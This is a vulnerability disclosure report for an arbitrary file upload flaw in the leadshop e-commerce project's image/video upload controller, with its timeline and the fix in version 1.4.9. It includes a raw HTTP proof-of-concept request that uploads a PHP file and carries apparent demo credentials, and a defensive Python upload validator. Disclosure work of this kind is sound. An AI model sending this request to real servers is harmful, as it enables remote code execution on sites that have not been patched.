Unrestricted Upload of File with Dangerous Type in qmpaas/leadshop


Reported on

Dec 2nd 2021


The vulnerability is in the api/ImageController.php file.

When $type is 2, the controller enters the video-upload branch. However, $upload->video, the function that handles video uploads, never checks the file extension of the uploaded file, so any file type can be uploaded through this path.
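A hardened upload check of the kind the video branch is missing, written here as an added example (Python, not leadshop's own PHP code): the allowlist, the container magic bytes and the sample inputs are assumptions constructed for the demonstration.

```python
import os
import re
import secrets
from typing import Tuple

# Assumed allowlist for the video branch; the real one is not on the page.
VIDEO_EXTENSIONS = {"mp4", "webm", "mov"}

# Constructed sample: an ISO BMFF (mp4) header has "ftyp" at offset 4.
MP4_HEAD = b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00isommp42"
# Constructed sample: a WebM/Matroska file starts with the EBML magic.
WEBM_HEAD = b"\x1a\x45\xdf\xa3" + b"\x00" * 12

_NAME_RE = re.compile(r"[A-Za-z0-9_\-]+(?:\.[A-Za-z0-9_\-]+)*\.([A-Za-z0-9]+)")


def _looks_like_video(head: bytes) -> bool:
    """Content check that does not trust the client-sent Content-Type."""
    return head[4:8] == b"ftyp" or head[:4] == b"\x1a\x45\xdf\xa3"


def validate_video_upload(filename: str, head: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied filename and its first bytes.

    Rejects path components and NUL bytes, requires the *last* extension to be
    on the allowlist (case-insensitive), then confirms the content is a video
    container, so "shell.php" and "shell.php.mp4" with PHP inside both fail.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or "\x00" in base:
        return False, "filename contains path or NUL characters"
    m = _NAME_RE.fullmatch(base)
    if not m:
        return False, "unexpected characters in filename"
    ext = m.group(1).lower()
    if ext not in VIDEO_EXTENSIONS:
        return False, f"extension .{ext} not allowed for video upload"
    if not _looks_like_video(head):
        return False, "content does not look like a video container"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Never reuse the client filename on disk: random stem plus validated ext."""
    return f"{secrets.token_hex(16)}.{ext.lower()}"


if __name__ == "__main__":
    for name, head in [("test.php", b"<?php echo 1;"), ("clip.mp4", MP4_HEAD)]:
        print(name, validate_video_upload(name, head))
```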

Proof of Concept

POST /index.php?q=/api/leadmall/image HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary="boundary"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTYzMTYwOTMxOSwiZXhwIjoxNjMxNjk1NzE5LCJpZCI6MX0.PdqX6vNh2LZ607lnd0J6JiU_Wf_SnPu3bbXVz4gfXEk
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 1127
Connection: close
Cookie: _csrf=d31c94bc1ac116b99cf287a046dc1642965fba6d4232d378c5719685445276fba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22lrOxUbG2yPlq8P0DwPnuvxdNBXzu4wIh%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Content-Disposition: form-data; name="type"

Content-Disposition: form-data; name="content"; filename="test.php"

<?php phpinfo();



This vulnerability allows authenticated users to upload arbitrary PHP files, which in turn can lead to RCE.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
leadshop开源商城 validated this vulnerability 2 years ago
afkl-cuit has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 years ago
We have sent a second fix follow up to the qmpaas/leadshop team. We will try again in 10 days. 2 years ago
We have sent a third and final fix follow up to the qmpaas/leadshop team. This report is now considered stale. 2 years ago


Hello @admin, I noticed that the qmpaas/leadshop team seems to have fixed this vulnerability in an update two months ago (the update commit is https://github.com/qmpaas/leadshop/commit/b81e65c1d45a4ff418fa11122a4ec4397d9a1425). So what should we do next?🤔

Jamie Slome marked this as fixed in 1.4.9 with commit b81e65 2 years ago
The fix bounty has been dropped
Jamie Slome
2 years ago

Sorted 👍
